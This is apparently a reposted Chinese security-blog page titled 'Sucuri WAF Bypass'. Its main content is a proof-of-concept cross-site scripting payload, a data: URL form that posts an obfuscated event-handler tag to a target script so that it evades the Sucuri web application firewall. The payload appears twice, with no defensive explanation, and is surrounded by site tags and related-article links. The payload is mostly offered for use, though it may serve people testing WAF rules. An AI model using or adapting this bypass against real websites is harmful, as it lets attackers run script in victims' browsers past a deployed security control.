Sucuri WAF Bypass

2022年5月31日14:48:36评论71 views字数 415阅读1分23秒阅读模式

Sucuri WAF Bypass

POC：

data:text/html,<form action=https://xxx.com.br/xss-waf.php method=post><input type=hidden name=a value="<K Contenteditable Autofocus OnFocusIn=[1].map(alert)>"><input type=submit value=XSS></form>

data:text/html,<form action=https://xxx.com.br/xss-waf.php method=post><input type=hidden name=a value="<K Contenteditable Autofocus OnFocusIn=[1].map(alert)>"><input type=submit value=XSS></form>

原文始发于微信公众号（Khan安全攻防实验室）：Sucuri WAF Bypass

左青龙
微信扫一扫

右白虎
微信扫一扫

sucuri
text
waf
form
data
value
html
type
input
bypass

本文由 admin 发表于 2022年5月31日14:48:36
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Sucuri WAF Bypasshttp://cn-sec.com/archives/1071421.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

Sucuri WAF Bypass

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

信创 | 国产数据库派别分类

应急响应常用命令手册

发表评论

在线咨询

微信